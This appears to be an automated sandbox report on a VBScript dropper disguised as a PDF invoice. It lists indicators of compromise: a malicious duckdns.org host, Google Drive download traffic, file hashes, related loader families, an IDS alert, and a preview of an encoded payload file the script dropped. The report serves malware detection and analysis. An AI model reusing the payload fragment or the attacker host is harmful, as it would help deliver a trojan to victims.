              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              drive.google.com0%VirustotalBrowse
              drive.usercontent.google.com1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://drive.usercontent.google.com1%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              http://drive.google.com0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              a458386d9.duckdns.org14%VirustotalBrowse
              https://drive.google.com0%VirustotalBrowse
              https://drive.usercontent.google.com1%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		172.217.16.206
              		truefalseunknown
              drive.usercontent.google.com
              		142.250.184.193
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              a458386d9.duckdns.orgtrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://www.google.compowershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://drive.googP2powershell.exe, 00000002.00000002.1583462169.0000029181C55000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                http://drive.usercontent.google.compowershell.exe, 00000002.00000002.1583462169.0000029181C93000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1885917031.0000000004F71000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://go.micropowershell.exe, 00000002.00000002.1583462169.0000029180BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://drive.google.compowershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.000002918190F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://drive.usercontent.googhpowershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://drive.google.compowershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.1583462169.0000029180001000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://apis.google.compowershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1583462169.0000029180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1885917031.0000000004F71000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  172.217.16.206
                  		drive.google.comUnited States
                  		15169GOOGLEUSfalse
                  142.250.184.193
                  		drive.usercontent.google.comUnited States
                  		15169GOOGLEUSfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1523159
                  Start date and time:2024-10-01 07:44:51 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 18s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:15
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:A 413736796#U00b7pdf.vbs
                  renamed because original name is a hash value
                  Original Sample Name:A 413736796pdf.vbs
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winVBS@9/7@2/2
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 76%
                  • Number of executed functions: 45
                  • Number of non-executed functions: 5
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 7756 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 8088 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  01:45:53API Interceptor88x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0eSolicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  Scanned Purchase List.vbsGet hashmaliciousUnknownBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  file.exeGet hashmaliciousLodaRATBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  file.exeGet hashmaliciousXWorm, XmrigBrowse
                  • 172.217.16.206
                  • 142.250.184.193
                  Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                  • 172.217.16.206
                  • 142.250.184.193

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):8003
                  Entropy (8bit):4.840877972214509
                  Encrypted:false
                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                  MD5:106D01F562D751E62B702803895E93E0
                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1940658735648508
                  Encrypted:false
                  SSDEEP:3:Nlllultnxj:NllU
                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:@...e................................................@..........

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hikc4af.mwx.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pex4s5l.gtq.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fi2q2dr.4qz.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoatdjyt.5qa.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Roaming\Sternman224.Ill

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):418636
                  Entropy (8bit):5.969251071288385
                  Encrypted:false
                  SSDEEP:6144:S83XmAQyiygSjfGah8odhsdRbEmU8Dpc8hGVjlbcmxxfdxCNKH77kuXJc+:p3WAQyHfn8oIfQqxgVJbcwFxHMC
                  MD5:CE86E8EBFB09204B1B79EDD6B0BA0AEE
                  SHA1:4D94C2433116295B08B1ACF3A693A9BD87B8D12B
                  SHA-256:1A4A1635D110E2F9F279138FCEEA9A3FC724E62AC91C199A83338C51053A450E
                  SHA-512:C20EA924DED0AD9C6CEF417396DF2C1BB9EA1D14F60F56D30C2A41F08FF60895E9E82FA8CD7C5CFB3934ACF138BAC7EB561027E4E9E46DD4711E6AFF49606F5D
                  Malicious:false
                  Preview:cQGbcQGbu43BFADrArZ56wIlTQNcJARxAZvrAgSvuTnA/O3rAjjN6wI99IHB+DBNJXEBm3EBm4HxMfFJE+sCVgTrArCt6wKuAXEBm7pYT3nfcQGb6wK81esCLOzrAnAEMcrrAhBocQGbiRQLcQGbcQGb0eJxAZtxAZuDwQTrAhdpcQGbgfkz8VQFfMxxAZvrAmdQi0QkBHEBm3EBm4nDcQGb6wJHrYHDnkWUAusCDYXrAodZukFGNYpxAZvrArC4gfKpSGzDcQGb6wILUYHq6A5ZSesCBLPrAthpcQGbcQGbcQGb6wL8lYsMEOsCg43rApCQiQwTcQGbcQGbQusC7ixxAZuB+kRQBAB11XEBm+sCG5KJXCQMcQGb6wJO9oHtAAMAAHEBm3EBm4tUJAhxAZtxAZuLfCQE6wJnDXEBm4nrcQGb6wLA0IHDnAAAAHEBm3EBm1NxAZtxAZtqQHEBm3EBm4nr6wKofnEBm8eDAAEAAADAbAXrAk9kcQGbgcMAAQAA6wIZLnEBm1PrArftcQGbievrAp34cQGbibsEAQAAcQGbcQGbgcMEAQAAcQGb6wK4fFPrAm+PcQGbav/rAnrwcQGbg8IFcQGb6wK5gjH2cQGbcQGbMclxAZtxAZuLGnEBm3EBm0FxAZtxAZs5HAp19HEBm+sCE8dG6wIpSOsCx+KAfAr7uHXd6wL7lesCYeSLRAr86wKLP3EBmynwcQGbcQGb/9JxAZvrAnzqukRQBABxAZvrAoa8McBxAZtxAZuLfCQMcQGbcQGbgTQHMeP0QnEBm3EBm4PABOsCNerrAkuROdB15HEBm+sC1TeJ++sCUCbrAjAC/9frAtds6wJLZFfaJ8fphXGDuAZ1rptjd0SwJ14/suWhy9RaOxmP9nWzQ4aIxbAi182esXWDCdF6WPan+UKA8YK0CCt1Njzj6Jdll3U2POOXkRx2krXzZVLDde70cNoTHMusaPVCMWck+b4tm2a1HnWphoEb

                  Static File Info

                  General

                  File type:ASCII text, with CRLF line terminators
                  Entropy (8bit):4.88426388982442
                  TrID:
                  • Visual Basic Script (13500/0) 100.00%
                  File name:A 413736796#U00b7pdf.vbs
                  File size:75'008 bytes
                  MD5:3f5e0a8b0d1ac0143d359bcb63171066
                  SHA1:7f6368b52a021340768f61ae047d88c7e6d4add3
                  SHA256:8da5ed79da8da8c5521a238f05bb61bd1e48c59fab0bee7758fc11c163142396
                  SHA512:a2a351604fd741bdb95f74836aad27de590eb96857413da9187071c37cc6efd5b261057cd6bec5b4df94d9dc61d3179d4a8a37a4e23b0d5279ba254e83b3f5b3
                  SSDEEP:1536:sC1DjneW/+yAxEfH8YQO2+VjuNaU7CGTE4+6GDoQVYf:sC1v/3A+fRVji7CW9dGGf
                  TLSH:D973B210B8F4263DC9610E98BD4F370484798D1BC22DBBA8E5CD0ABF3F9146CB67A156
                  File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi

                  File Icon

                  Icon Hash:68d69b8f86ab9a86

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-10-01T07:46:28.837001+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849708172.217.16.206443TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 1, 2024 07:45:54.483972073 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:54.484006882 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:54.484081030 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:54.490957022 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:54.490969896 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:55.126362085 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:55.126431942 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:55.127547979 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:55.127598047 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:55.131798983 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:55.131809950 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:55.132128000 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:55.145576954 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:55.187397003 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:55.510690928 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:55.511737108 CEST44349705172.217.16.206192.168.2.8
                  Oct 1, 2024 07:45:55.511785030 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:55.515775919 CEST49705443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:45:55.526582956 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:55.526617050 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:55.526681900 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:55.527098894 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:55.527107954 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:56.159070015 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:56.159151077 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:56.161952019 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:56.161962986 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:56.162204981 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:56.163216114 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:56.203396082 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.452300072 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.452409983 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.458314896 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.458405972 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.470881939 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.470947027 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.471045017 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.471062899 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.471107960 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.477376938 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.527050018 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.538697004 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.538758993 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.538830042 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.538841963 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.541619062 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.541672945 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.541681051 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.547907114 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.547992945 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.548001051 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.554264069 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.554332972 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.554338932 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.560591936 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.560765982 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.560775042 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.566945076 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.567004919 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.567012072 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.573218107 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.573285103 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.573292971 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.579540014 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.579613924 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.579622984 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.585474968 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.585558891 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.585571051 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.591151953 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.591208935 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.591216087 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.596914053 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.596987963 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.596997023 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.605899096 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.605950117 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.605961084 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.624675989 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.624730110 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.624742985 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.624753952 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.624794006 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.624799967 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.625030041 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.625075102 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.625082016 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.628142118 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.628192902 CEST49706443192.168.2.8142.250.184.193
